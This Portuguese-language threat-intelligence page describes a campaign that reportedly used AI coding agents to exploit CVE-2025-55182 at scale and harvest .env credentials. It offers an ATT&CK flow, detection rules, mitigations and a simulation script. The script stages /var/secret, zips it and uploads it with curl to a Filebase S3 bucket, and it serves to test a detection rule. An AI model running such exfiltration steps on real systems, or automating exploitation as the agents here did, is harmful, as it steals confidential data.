Bissa Scanner Exposto: Exploração em Massa e Coleta de Credenciais Assistidas por IA
Seguir 
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumo
Um servidor exposto revelou uma operação em larga escala que utilizava a plataforma de scanner Bissa, Claude Code e OpenClaw para automatizar a exploração de alvos expostos à internet via uma vulnerabilidade React2Shell (CVE-2025-55182). A campanha colheu milhões de arquivos .env contendo credenciais de alto valor de serviços de IA, nuvem, pagamento e mensagens. Os dados coletados foram enviados para um bucket S3 público no Filebase para uso posterior. A operação tinha como alvo organizações nos setores financeiro, de criptomoedas e varejo.
Investigação
Os analistas recuperaram mais de 13.000 arquivos mostrando o fluxo de trabalho para escanear, explorar, validar e priorizar ambientes vítimas. Os registros confirmaram mais de 900 compromissos bem-sucedidos usando o exploit React2Shell. Bots do Telegram foram usados para alertas em tempo real, vinculando cada acerto aos detalhes das vítimas. O scanner também continha um módulo para uma vulnerabilidade do WordPress W3 Total Cache (CVE-2025-9501), embora nenhuma exploração bem-sucedida tenha sido observada.
Mitigação
Corrija prontamente aplicativos e estruturas vulneráveis, especialmente os componentes React2Shell e WordPress W3 Total Cache. Mova segredos de arquivos .env para gerenciadores de segredos dedicados e altere as credenciais regularmente. Reforce o acesso a metadados da nuvem e aplique RBAC de menor privilégio. Monitore o tráfego de saída para detectar uploads não autorizados para serviços de armazenamento externos.
Resposta
Implemente regras de detecção para exploração do CVE-2025-55182 e uploads não autorizados para S3. Bloqueie domínios maliciosos conhecidos e comunicações de bots do Telegram. Conduza análises forenses de hosts comprometidos para localizar e remover cargas residuais. Notifique usuários afetados e altere quaisquer credenciais vazadas imediatamente.
"graph TB %% Class definitions classDef technique fill:#ffcc99 classDef tool fill:#cccccc classDef action fill:#99ccff classDef operator fill:#ff9900 %% Nodes tool_bissa_scanner["<b>Tool</b> – <b>Name</b>: Bissa scanner<br/><b>Purpose</b>: Perform massive active scanning using target feeds"] class tool_bissa_scanner tool tech_T1595_002["<b>Technique</b> – <b>T1595.002 Active Scanning: Vulnerability Scanning</b><br/><b>Description</b>: Scans Internetu2011facing hosts to find vulnerable services"] class tech_T1595_002 technique tech_T1190["<b>Technique</b> – <b>T1190 Exploit Publicu2011Facing Application</b><br/><b>Description</b>: Exploits vulnerable web applications to gain initial access"] class tech_T1190 technique tool_react2shell["<b>Tool</b> – <b>Name</b>: React2Shell (CVEu20112025u201155182)<br/><b>Function</b>: Provides remote code execution via crafted React payload"] class tool_react2shell tool tech_T1210["<b>Technique</b> – <b>T1210 Exploitation of Remote Services</b><br/><b>Description</b>: Executes payload on remote services to obtain code execution"] class tech_T1210 technique tech_T1211["<b>Technique</b> – <b>T1211 Exploitation for Defense Evasion</b><br/><b>Description</b>: Uses vulnerabilities to bypass defenses and stay hidden"] class tech_T1211 technique tech_T1552_001["<b>Technique</b> – <b>T1552.001 Unsecured Credentials: Credentials In Files</b><br/><b>Description</b>: Harvests credentials stored in configuration files such as .env"] class tech_T1552_001 technique tech_T1119["<b>Technique</b> – <b>T1119 Automated Collection</b><br/><b>Description</b>: Automates validation, prioritization, and batching of collected data for exfiltration"] class tech_T1119 technique tech_T1102_002["<b>Technique</b> – <b>T1102.002 Web Service: Bidirectional Communication</b><br/><b>Description</b>: Uses web services (Telegram bots) to exchange commands and data"] class tech_T1102_002 technique tool_telegram_bot["<b>Tool</b> – <b>Name</b>: Telegram bots @bissapwned_bot, @bissa_scan_bot<br/><b>Purpose</b>: Commandu2011andu2011control channel"] class tool_telegram_bot tool tech_T1567_002["<b>Technique</b> – <b>T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage</b><br/><b>Description</b>: Uploads stolen archives to cloud storage via web service"] class tech_T1567_002 technique tool_filebase_bucket["<b>Tool</b> – <b>Name</b>: Filebase S3u2011compatible bucket (bissapromax)<br/><b>Purpose</b>: Stores exfiltrated credential archives"] class tool_filebase_bucket tool tech_T1537["<b>Technique</b> – <b>T1537 Transfer Data to Cloud Account</b><br/><b>Description</b>: Moves data to an attackeru2011controlled cloud account for later retrieval"] class tech_T1537 technique tech_T1068["<b>Technique</b> – <b>T1068 Exploitation for Privilege Escalation</b><br/><b>Description</b>: Leverages harvested credentials to gain higher privileges and lateral movement"] class tech_T1068 technique %% Connections tool_bissa_scanner –>|performs| tech_T1595_002 tech_T1595_002 –>|identifies vulnerable services| tech_T1190 tech_T1190 –>|uses| tool_react2shell tool_react2shell –>|delivers payload to| tech_T1210 tech_T1210 –>|enables| tech_T1211 tech_T1211 –>|allows| tech_T1552_001 tech_T1552_001 –>|feeds into| tech_T1119 tech_T1119 –>|sends data via| tech_T1102_002 tech_T1102_002 –>|implemented by| tool_telegram_bot tech_T1102_002 –>|exfiltrates to| tech_T1567_002 tech_T1567_002 –>|stores in| tool_filebase_bucket tool_filebase_bucket –>|enables| tech_T1537 tech_T1537 –>|supports| tech_T1068 "
Fluxo de Ataque
Detecções
Possível Tentativa de Exploração CVE-2025-55182 (RCE não autenticada em Componentes do Servidor React) (via servidor web)
Ver
Possível Tentativa de Exploração CVE-2025-55182 (RCE não autenticada em Componentes do Servidor React) (via proxy)
Ver
Possíveis Comunicações C2 Sobre HTTP Para IP Direto Com Porta Incomum (via proxy)
Ver
Exfiltração de Dados via Filebase Compatível com S3 [Proxy]
Ver
Exfiltração de Dados via Filebase Compatível com S3 [AWS Cloudtrail]
Ver
Execução de Simulação
Pré-requisito: O Check Preliminar de Telemetria & Baseline deve ter sido aprovado.
-
Narrativa de Ataque & Comandos:
O adversário coletou um conjunto de documentos confidenciais de/var/secret/. Para evitar detecção, eles primeiro arquivam os dados em um arquivo ZIP protegido por senha, depois usamcurlpara subir o arquivo diretamente para o endpoint S3 do Filebase através do proxy corporativo. O proxy registra a URL completa da solicitação, que corresponde à regra de detecção. -
Script de Teste de Regressão:
#!/usr/bin/env bash set -euo pipefail # 1️⃣ Stage data (T1074) STAGE_DIR="/tmp/staged_data" mkdir -p "$STAGE_DIR" cp -r /var/secret/* "$STAGE_DIR/" # 2️⃣ Archive data (T1560.001) – password protected zip ARCHIVE="/tmp/exfil_archive.zip" ZIP_PASSWORD="P@ssw0rd!" zip -r -P "$ZIP_PASSWORD" "$ARCHIVE" "$STAGE_DIR" > /dev/null # 3️⃣ Exfiltrate via Filebase S3 endpoint (T1020) # Assume the proxy is reachable at http://proxy.company.local:3128 FILEBASE_URL="https://s3.filebase.com/mybucket/exfil_archive.zip" curl -x http://proxy.company.local:3128 -T "$ARCHIVE" -H "Host: s3.filebase.com" -H "User-Agent: Mozilla/5.0" "$FILEBASE_URL" --silent --output /dev/null echo "Exfiltration attempt completed." -
Comandos de Limpeza:
# Remove staged files and archive rm -rf /tmp/staged_data /tmp/exfil_archive.zip # (Optional) Flush proxy connections if needed # For Squid: squid -k rotate echo "Cleanup finished."